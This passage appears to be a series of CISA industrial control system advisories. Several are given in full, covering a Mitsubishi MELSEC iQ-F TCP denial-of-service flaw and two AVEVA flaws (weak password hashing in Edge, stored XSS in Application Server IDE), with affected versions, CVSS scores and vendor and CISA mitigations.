
Abhishek Pandey from Payatu Security Consulting Pvt. Ltd. reported these vulnerabilities to CISA.

4. MITIGATIONS

General Industrial Controls (GIC) did not respond to CISA’s attempts to coordinate. Users of General Industrial Controls Lynx+ Gateway are encouraged to reach out to GIC for more information.

CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as:

• Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
• Locate control system networks and remote devices behind firewalls and isolating them from business networks.
• When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.

5. UPDATE HISTORY

• November 13, 2025: Initial Publication

View CSAF

1. EXECUTIVE SUMMARY

• CVSS v3 5.3
• ATTENTION: Exploitable remotely/low attack complexity
• Vendor: Mitsubishi Electric
• Equipment: MELSEC iQ-F Series
• Vulnerability: Improper Validation of Specified Quantity in Input

2. RISK EVALUATION

Successful exploitation of this vulnerability could allow an attacker to cause a denial-of-service condition on the product.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

The following versions of Mitsubishi Electric MELSEC iQ-F Series are affected:

• FX5U-32MT/ES: All versions
• FX5U-32MT/DS: All versions
• FX5U-32MT/ESS: All versions
• FX5U-32MT/DSS: All versions
• FX5U-64MT/ES: All versions
• FX5U-64MT/DS: All versions
• FX5U-64MT/ESS: All versions
• FX5U-64MT/DSS: All versions
• FX5U-80MT/ES: All versions
• FX5U-80MT/DS: All versions
• FX5U-80MT/ESS: All versions
• FX5U-80MT/DSS: All versions
• FX5U-32MR/ES: All versions
• FX5U-32MR/DS: All versions
• FX5U-64MR/ES: All versions
• FX5U-64MR/DS: All versions
• FX5U-80MR/ES: All versions
• FX5U-80MR/DS: All versions
• FX5UC-32MT/D: All versions
• FX5UC-32MT/DSS: All versions
• FX5UC-64MT/D: All versions
• FX5UC-64MT/DSS: All versions
• FX5UC-96MT/D: All versions
• FX5UC-96MT/DSS: All versions
• FX5UC-32MT/DS-TS: All versions
• FX5UC-32MT/DSS-TS: All versions
• FX5UC-32MR/DS-TS: All versions
• FX5UJ-24MT/ES: All versions
• FX5UJ-24MT/DS: All versions
• FX5UJ-24MT/ESS: All versions
• FX5UJ-24MT/DSS: All versions
• FX5UJ-40MT/ES: All versions
• FX5UJ-40MT/DS: All versions
• FX5UJ-40MT/ESS: All versions
• FX5UJ-40MT/DSS: All versions
• FX5UJ-60MT/ES: All versions
• FX5UJ-60MT/DS: All versions
• FX5UJ-60MT/ESS: All versions
• FX5UJ-60MT/DSS: All versions
• FX5UJ-24MR/ES: All versions
• FX5UJ-24MR/DS: All versions
• FX5UJ-40MR/ES: All versions
• FX5UJ-40MR/DS: All versions
• FX5UJ-60MR/ES: All versions
• FX5UJ-60MR/DS: All versions
• FX5UJ-24MR/ES-A: All versions
• FX5UJ-24MT/ES-A: All versions
• FX5UJ-40MR/ES-A: All versions
• FX5UJ-40MT/ES-A: All versions
• FX5UJ-60MR/ES-A: All versions
• FX5UJ-60MT/ES-A: All versions
• FX5S-30MT/ES: All versions
• FX5S-30MT/DS: All versions
• FX5S-30MT/ESS: All versions
• FX5S-30MT/DSS: All versions
• FX5S-40MT/ES: All versions
• FX5S-40MT/DS: All versions
• FX5S-40MT/ESS: All versions
• FX5S-40MT/DSS: All versions
• FX5S-60MT/ES: All versions
• FX5S-60MT/DS: All versions
• FX5S-60MT/ESS: All versions
• FX5S-60MT/DSS: All versions
• FX5S-80MT/ES: All versions
• FX5S-80MT/DS: All versions
• FX5S-80MT/ESS: All versions
• FX5S-80MT/DSS: All versions
• FX5S-30MR/ES: All versions
• FX5S-30MR/DS: All versions
• FX5S-40MR/ES: All versions
• FX5S-40MR/DS: All versions
• FX5S-60MR/ES: All versions
• FX5S-60MR/DS: All versions
• FX5S-80MR/ES: All versions
• FX5S-80MR/DS: All versions
• FX5S-30MR/ES-A: All versions
• FX5S-30MT/ES-A: All versions
• FX5S-40MR/ES-A: All versions
• FX5S-40MT/ES-A: All versions
• FX5S-60MR/ES-A: All versions
• FX5S-60MT/ES-A: All versions
• FX5S-80MR/ES-A: All versions
• FX5S-80MT/ES-A: All versions

3.2 VULNERABILITY OVERVIEW

3.2.1 IMPROPER VALIDATION OF SPECIFIED QUANTITY IN INPUT CWE-1284

A denial-of-service (DoS) vulnerability exists in the TCP communication function on the MELSEC iQ-F Series CPU module. A remote attacker may be able to disconnect the connection by sending specially crafted TCP packets to cause a denial-of-service (DoS) condition on the products (CVE-2025-10259). There is no impact on connections other than the attacked one.

CVE-2025-10259 has been assigned to this vulnerability. A CVSS v3.1 base score of 5.3 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).

3.3 BACKGROUND

• CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing
• COUNTRIES/AREAS DEPLOYED: Worldwide
• COMPANY HEADQUARTERS LOCATION: Japan

3.4 RESEARCHER

Qian Zou, Ke Xu, Xuewei Feng, Qi Li, Xueying Li, and Gang Jin from Zhongguancun Laboratory and Tsinghua University reported this vulnerability to Mitsubishi Electric.

4. MITIGATIONS

Mitsubishi Electric recommends that users take the following mitigation measures to minimize the risk of exploiting this vulnerability:

• Use a virtual private network (VPN) to encrypt the communication when Internet access is required.
• Restrict physical access to the affected products and the LAN that is connected by them.

For more information, see Mitsubishi Electric Advisory 2025-014.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.

5. UPDATE HISTORY

• November 13, 2025: Initial Republication of Mitsubishi Electric Advisory 2025-014

View CSAF

1. EXECUTIVE SUMMARY

• CVSS v4 8.3
• ATTENTION: Low attack complexity
• Vendor: AVEVA
• Equipment: Edge
• Vulnerability: Use of a Broken or Risky Cryptographic Algorithm

2. RISK EVALUATION

Successful exploitation of this vulnerability could allow a local attacker to reverse engineer passwords through brute force.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

The following versions of AVEVA Edge (formerly InduSoft Web Studio), a HMI/SCADA software, are affected:

• Edge: Versions 2023 R2 and prior

3.2 VULNERABILITY OVERVIEW

3.2.1 USE OF A BROKEN OR RISKY CRYPTOGRAPHIC ALGORITHM CWE-327

The vulnerability, if exploited, could allow a miscreant with read access to Edge Project files or Edge Offline Cache files to reverse engineer Edge users’ app-native or Active Directory passwords through computational brute-forcing of weak hashes.

CVE-2025-9317 has been assigned to this vulnerability. A CVSS v3.1 base score of 8.4 has been calculated; the CVSS vector string is (AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N).

A CVSS v4 score has also been calculated for CVE-2025-9317. A base score of 8.3 has been calculated; the CVSS vector string is (AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N).

3.3 BACKGROUND

• CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing
• COUNTRIES/AREAS DEPLOYED: Worldwide
• COMPANY HEADQUARTERS LOCATION: United Kingdom

3.4 RESEARCHER

Joao Varelas reported this vulnerability to CISA.

4. MITIGATIONS

AVEVA recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.

Users using the affected product versions should take the following actions to mitigate the risk of exploit:

• Apply AVEVA Edge 2023 R2 P01 Security Update and migrate old project files.
• For projects that cannot be migrated (e.g. backups or transient copies), evaluate the risk of potential password leakage from these files and implement stricter read access controls to protect these unsafe files.
• Require AVEVA Edge users to change their passwords.
• Important: Edge project migration from older versions to 2023 R2 P01 is one-way due to the change in password hashing algorithms.

The following general defensive measures are recommended:

• Access Control Lists should be applied to all folders where users will save and load project files.
• Maintain a trusted chain-of-custody on project files during creation, modification, distribution, and use.
• Apply data-protection at the project level with a strong master password. For configuration step-by-step refer to AVEVA Edge “Technical Reference Manual” > Project Overview > Configuring Additional Project Settings > Options Tab > Data Protection.
• If passwords are being used as function parameters inside project documents (such as scripts or worksheets), it is recommended to remove those passwords and use project tags instead. For more information on tags refer to AVEVA Edge “Technical Reference Manual” > Tags and the Tag Database > About Tags and the Project Database.

For information on how to reach AVEVA support for your product, please refer to this link: AVEVA Customer Support.

For more information, see AVEVA’s Security Bulletin AVEVA-2025-006 or AVEVA’s bulletins page.

CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability, such as:

• Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
• Locate control system networks and remote devices behind firewalls and isolating them from business networks.
• When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:

• Do not click web links or open attachments in unsolicited email messages.
• Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
• Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely.

5. UPDATE HISTORY

• November 13, 2025: Initial Republication of AVEVA-2025-006

View CSAF

1. EXECUTIVE SUMMARY

• CVSS v4 7.2
• ATTENTION: Low attack complexity
• Vendor: AVEVA
• Equipment: Application Server IDE
• Vulnerability: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)

2. RISK EVALUATION

Successful exploitation of this vulnerability could allow an attacker to tamper with help files and inject cross-site scripting (XSS) code.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

The following versions of AVEVA Application Server are affected:

• Application Server: Versions 2023 R2 SP1 P02 and prior

3.2 VULNERABILITY OVERVIEW

3.2.1 IMPROPER NEUTRALIZATION OF SCRIPT-RELATED HTML TAGS IN A WEB PAGE (BASIC XSS) CWE-80

The vulnerability, if exploited, could allow an authenticated miscreant (with privilege of “aaConfigTools”) to tamper with App Objects’ help files and persist a cross-site scripting (XSS) injection that when executed by a victim user, can result in horizontal or vertical escalation of privileges. The vulnerability can only be exploited during config-time operations within the IDE component of Application Server. Run-time components and operations are not affected.

CVE-2025-8386 has been assigned to this vulnerability. A CVSS v3.1 base score of 6.9 has been calculated; the CVSS vector string is (AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L).

A CVSS v4 score has also been calculated for CVE-2025-8386. A base score of 7.2 has been calculated; the CVSS vector string is (AV:L/AC:L/AT:N/PR:H/UI:P/VC:H/VI:L/VA:L/SC:H/SI:H/SA:H).

3.3 BACKGROUND

• CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing
• COUNTRIES/AREAS DEPLOYED: Worldwide
• COMPANY HEADQUARTERS LOCATION: United Kingdom

3.4 RESEARCHER

AVEVA reported this vulnerability to CISA.

4. MITIGATIONS

AVEVA recommends that organizations evaluate the impact of these vulnerabilities based on their operational environment, architecture, and product implementation. Users using affected product versions should apply security updates to mitigate the risk of exploit.

All affected versions of the Application Server IDE can be fixed by upgrading to AVEVA System Platform 2023 R2 SP1 P03 or higher.

The following general defensive measures are recommended:

• Audit assigned permissions to ensure that only trusted users are added to the “aaConfigTools” OS Group. For additional information on Application Server OS Security groups and accounts, see https://docs.aveva.com/bundle/sp-install/page/738031.html

For more information, see AVEVA’s Security Bulletin AVEVA-2025-005 or AVEVA’s bulletins page.

CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability, such as:

• Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
• Locate control system networks and remote devices behind firewalls and isolating them from business networks.
• When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:

• Do not click web links or open attachments in unsolicited email messages.
• Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
• Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely.

5. UPDATE HISTORY

• November 13, 2025: Initial Republication of AVEVA-2025-005